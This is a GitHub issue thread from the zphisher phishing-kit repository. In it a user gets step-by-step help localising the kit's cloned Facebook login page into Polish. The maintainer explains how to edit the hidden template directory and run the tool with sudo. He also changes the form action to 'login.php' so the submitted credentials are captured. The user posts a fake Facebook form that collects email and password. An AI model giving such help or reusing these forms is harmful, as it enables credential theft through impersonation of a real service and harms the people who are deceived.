### ISSUE TITLE
Page Translation 

### ISSUE THREAD

**Issue by ShadowSensi666** [htr-tech/zphisher#493]
### Is your proposal related to a problem?

Is there any possibility to change the url language of the page, best regards? :D

**Comment by htr-tech** [comment]
*url language* means ? the content of the page ?

**Comment by ShadowSensi666** [comment]
> _url language_ means ? language of the content in the page ?

Language of the page

**Comment by htr-tech** [comment]
> > _url language_ means ? language of the content in the page ?
> 
> Language of the page from english to Polish

you can fork this repo & edit the pages inside `.sites` directory

**Comment by ShadowSensi666** [comment]
> > Language of the page from english to Polish
> 
> you can fork this repo & edit the pages inside `.sites` directory

But I don't see in the main folder

**Comment by htr-tech** [comment]
> But I don't see in the main folder

type `ls -a` in order to see the directory

**Comment by ShadowSensi666** [comment]
ok i have opened the catalog but don't know how to change index.html

**Comment by ShadowSensi666** [comment]
When I change the html files it shows no access in the application and it does not show the page what to do

**Comment by htr-tech** [comment]
uh 😕  provide some screenshots plZ

**Comment by ShadowSensi666** [comment]
I changed login.html and mobile.html to polish website but i see in english
![Screenshot_2022-04-15_09_33_58](https://user-images.githubusercontent.com/93340489/163577450-c5ddbc9f-c334-4487-ba89-805336c4b612.png)

**Comment by htr-tech** [comment]
run zphisher using root privilege `sudo bash zphisher.sh`

**Comment by ShadowSensi666** [comment]
The language will change to Polish but I can't see the login and password ;/
![Screenshot_2022-04-16_06_12_53](https://user-images.githubusercontent.com/93340489/163671139-bcd874ed-d3e6-40cf-ba51-ff1b7d2982a9.png)
![Screenshot_2022-04-16_06_17_09](https://user-images.githubusercontent.com/93340489/163671195-792c5b31-e1f6-43a5-aa97-5cf46e7a4dfc.png)

**Comment by htr-tech** [comment]
you have done something on the template pages... i can't help you much about that...

but try it without `/login/`  I think something is fishy there 🐟 
![image](https://user-images.githubusercontent.com/56682134/163680502-69dfd649-e699-440e-9c4f-2b499363413c.png)

**Comment by ShadowSensi666** [comment]
I change only html files

**Comment by htr-tech** [comment]
fork this repo & upload your files there...i will take a look at that

**Comment by ShadowSensi666** [comment]
Please take a look man https://files.fm/u/k3we3kc83 I modify facebook and in program traditional login page thx man

**Comment by ShadowSensi666** [comment]
I think delete orginal facebook php files and add this <h1>Facebook</h1>
  <form class="login-form" action="login.php" method="post">
    <label>
      <input type="text" name="email" placeholder="Email or phone" required>
    </label>
    <label>
      <input type="password" name="pass" placeholder="Password" required>
    </label>
    <input type="submit" value="Login">
  </form>

**Comment by ShadowSensi666** [comment]
`<h1>Facebook</h1>
  <form class="login-form" action="login.php" method="post">
    <label>
      <input type="text" name="email" placeholder="Email or phone" required>
    </label>
    <label>
      <input type="password" name="pass" placeholder="Password" required>
    </label>
    <input type="submit" value="Login">
  </form>`

**Comment by htr-tech** [comment]
![image](https://user-images.githubusercontent.com/56682134/163715598-4d0c0e33-36f4-469a-874c-78425f81971b.png)

works fine

**Comment by htr-tech** [comment]
on login.html change `action="login.php"`
```
<form class="_9vtf" data-testid="royal_login_form" action="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjUwMDI3OTc1LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D" method="post" onsubmit="" id="u_0_a_/p">
```
with
```
<form class="_9vtf" data-testid="royal_login_form" action="login.php" method="post" onsubmit="" id="u_0_a_OZ">
```
